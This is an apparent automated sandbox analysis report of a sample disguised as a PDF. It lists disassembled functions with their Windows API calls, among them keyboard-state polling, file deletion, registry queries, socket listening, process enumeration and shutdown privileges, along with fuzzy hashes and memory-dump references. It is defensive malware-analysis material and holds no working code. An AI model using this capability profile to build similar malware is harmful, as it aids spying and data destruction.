                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                                    • Instruction ID: f4565c250fee65eb59b4dced8966e516732aa2b738f373c833bd95351dd69d8b
                                                    • Opcode Fuzzy Hash: 823baeb521bb0f17bd6d1436cc42f925c8b7ca89a84eb19d87e817d09480e59c
                                                    • Instruction Fuzzy Hash: B7513C71900619BBDF169F95DC45EEEBBB9FF44300F048129F915EA290D738AA05CB61
                                                    Function 003863F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                                      • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                                    • _wcscat.LIBCMT ref: 00386441
                                                    • __wsplitpath.LIBCMT ref: 0038645F
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00386474
                                                    • _wcscpy.LIBCMT ref: 003864A3
                                                    • _wcscat.LIBCMT ref: 003864B8
                                                    • _wcscat.LIBCMT ref: 003864CA
                                                    • DeleteFileW.KERNEL32(?), ref: 003864DA
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003864EB
                                                    • FindClose.KERNEL32(00000000), ref: 00386506
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                    • String ID: \*.*
                                                    • API String ID: 2643075503-1173974218
                                                    • Opcode ID: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                                    • Instruction ID: 9a1facd701b6afc5db46735b1db745ffc9dc37f39e21a0e07f5ac346c2443e5e
                                                    • Opcode Fuzzy Hash: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                                    • Instruction Fuzzy Hash: 393184B24083849EC722EBA48886DDFB7DCAF56310F44496EF6D8C7141EA35E50D8767
                                                    Function 003A31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A328E
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003A332D
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003A33C5
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003A3604
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A3611
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: b148e20cfc7cd63a0e26a746755cddc7de06f1be0e49df60d0358141ae88e260
                                                    • Instruction ID: f1742b151c68882365903674b71f479ecd86167d1fec31b87f114ec56722d15d
                                                    • Opcode Fuzzy Hash: b148e20cfc7cd63a0e26a746755cddc7de06f1be0e49df60d0358141ae88e260
                                                    • Instruction Fuzzy Hash: 5BE15D75604210AFCB16DF29C995E6ABBE8FF8A710F04886DF44ADB261DB30ED05CB51
                                                    Function 00382B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00382B5F
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00382BE0
                                                    • GetKeyState.USER32(000000A0), ref: 00382BFB
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00382C15
                                                    • GetKeyState.USER32(000000A1), ref: 00382C2A
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00382C42
                                                    • GetKeyState.USER32(00000011), ref: 00382C54
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00382C6C
                                                    • GetKeyState.USER32(00000012), ref: 00382C7E
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00382C96
                                                    • GetKeyState.USER32(0000005B), ref: 00382CA8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                                    • Instruction ID: 532c199b9bfda272fb8d3c580714ed1951ced2e72e30aad6fbb31ce2b21ec0d7
                                                    • Opcode Fuzzy Hash: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                                    • Instruction Fuzzy Hash: E841B2345047C96DFF37BB6489047BBBEB06F12344F0580D9E9C6562C2EBA499C8C7A2
                                                    Function 00396D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                                    • Instruction ID: 262c0081097a17ecfe95b50cd07c9c4051f297e8aaf256c4022e34688dbbbfd5
                                                    • Opcode Fuzzy Hash: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                                    • Instruction Fuzzy Hash: 40215A31301210AFDB13AF64DD4AF6E77A8EF44711F05842AF95ADB2A1DB30E911CB54
                                                    Function 0039C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00379ABF: CLSIDFromProgID.OLE32 ref: 00379ADC
                                                      • Part of subcall function 00379ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                                      • Part of subcall function 00379ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                                      • Part of subcall function 00379ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0039C235
                                                    • _memset.LIBCMT ref: 0039C242
                                                    • _memset.LIBCMT ref: 0039C360
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0039C38C
                                                    • CoTaskMemFree.OLE32(?), ref: 0039C397
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0039C3E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                                    • Instruction ID: b3dc16d3ccadd1fede2f28ceed1c5852d7b00d9c3602202930b6e2a183a88389
                                                    • Opcode Fuzzy Hash: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                                    • Instruction Fuzzy Hash: FA913E71D10218ABDF12DF95DC91EEEBBB8EF04710F10816AF519AB291DB706A45CFA0
                                                    Function 003879D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                                      • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                                      • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00387A0F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                                    • Instruction ID: 546218665d2453d73a47970211b6169efe9b2c7507e1f5baed10797f8645093c
                                                    • Opcode Fuzzy Hash: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                                    • Instruction Fuzzy Hash: DD01B5716583116AE72E3664CC8ABBE725D9700340F3504A4FD03E21C1D669DE0083B4
                                                    Function 00349B60 Relevance: 9.8, Strings: 7, Instructions: 1055COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$T.?$VUUU$VUUU$VUUU$VUUU$>
                                                    • API String ID: 0-3347510974
                                                    • Opcode ID: a7e8a1d77df2a7fdc6973e2f99effb990726f757b37d935e0f286874fd14d3f6
                                                    • Instruction ID: 77a6448cd521cd2dfab09aa2659122247bf1772c9e61a74b24a6d263f2385a98
                                                    • Opcode Fuzzy Hash: a7e8a1d77df2a7fdc6973e2f99effb990726f757b37d935e0f286874fd14d3f6
                                                    • Instruction Fuzzy Hash: 3692B171E0061ACBDF26CF58C881BAEB7F5BB54314F15859AD81AEB280D770AD81CF91
                                                    Function 00398C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00398CA8
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398CB7
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00398CD3
                                                    • listen.WSOCK32(00000000,00000005), ref: 00398CE2
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398CFC
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00398D10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                                    • Instruction ID: 889cbc4d916eedb90dabb0599fa07347609df62e5d02ee9fd4a75f28d12162ec
                                                    • Opcode Fuzzy Hash: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                                    • Instruction Fuzzy Hash: 3321B1316002009FCB12EF68CD45F6EB7E9EF89720F118558F956EB2E2CB70AD418B61
                                                    Function 00386532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00386583
                                                    • __wsplitpath.LIBCMT ref: 003865A7
                                                    • _wcscat.LIBCMT ref: 003865BA
                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                    • String ID:
                                                    • API String ID: 1605983538-0
                                                    • Opcode ID: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                                    • Instruction ID: 4554f64c8dc4530dc9a96716584d2f19eb124e785e456ac47c651b79fcb1122c
                                                    • Opcode Fuzzy Hash: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                                    • Instruction Fuzzy Hash: BA216271900218ABDB12BBA4CD89FEEB7BCAB49300F5004E9F505E7145EB71AF85CB60
                                                    Function 003813CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003813DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($,2?$<2?$|
                                                    • API String ID: 1659193697-3385512009
                                                    • Opcode ID: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                                    • Instruction ID: 7bb2461deb0c6f4248ccfa2e61f8195f5b6fa2c75bfd4ea49f0691353aaf0caa
                                                    • Opcode Fuzzy Hash: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                                    • Instruction Fuzzy Hash: A5323675A007059FC729DF69C48196AB7F4FF48320B12C4AEE59ADB3A1E770E942CB44
                                                    Function 0039923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00399296
                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003992B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                                    • Instruction ID: 4978d68f6583b19c1e5e04f8a27cefa290613f78835a6650d6d1f21d57b11e0b
                                                    • Opcode Fuzzy Hash: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                                    • Instruction Fuzzy Hash: 3741AE70600204AFDB12AF68C882F7E77EDEF44724F14455DF956AF2A2DB74AE018B91
                                                    Function 0038EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038EB8A
                                                    • _wcscmp.LIBCMT ref: 0038EBBA
                                                    • _wcscmp.LIBCMT ref: 0038EBCF
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0038EBE0
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0038EC0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                                    • Instruction ID: 1e5cfc3a5b6b76536c7fbb156b7366537efda2d994c73a91a5f63cc95b00db8c
                                                    • Opcode Fuzzy Hash: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                                    • Instruction Fuzzy Hash: CD41AD356043018FC71AEF28C491E9AB3E8FF4A324F10459DFA5A8B3A1DB31B944CB91
                                                    Function 003A8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                                    • Instruction ID: 132bddfedb8d78186be859a1ec20cd631fe37b1a70cdf355c04560d71a2ac0ce
                                                    • Opcode Fuzzy Hash: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                                    • Instruction Fuzzy Hash: 9511BC313002116FE7232F26DC84E6FBB9CEF86760F450429F84ADB291CF30E90286A4
                                                    Function 0035E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0035E014,74DF0AE0,0035DEF1,003DDC38,?,?), ref: 0035E02C
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0035E03E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                                    • Instruction ID: 9994c6dd4d99242e31d3ecf5f6f2bcd63bc45a70a96ce64d326666b9d595b48b
                                                    • Opcode Fuzzy Hash: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                                    • Instruction Fuzzy Hash: 37D0A732800712DFC7374F61EC08E7376D8AB10301F2D4429F882D31A0D7B4D8848750
                                                    Function 00353B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::exception::exception
                                                    • String ID: @$ @$ @$ @
                                                    • API String ID: 3728558374-1793783390
                                                    • Opcode ID: 242b67ade364af05e99b7da00b41925a26dd2117e0b8b70efc69abe2101504af
                                                    • Instruction ID: 6205727fc5bacc2c2cb0dd2f2363677ac37c947122b027883deef174b72334d9
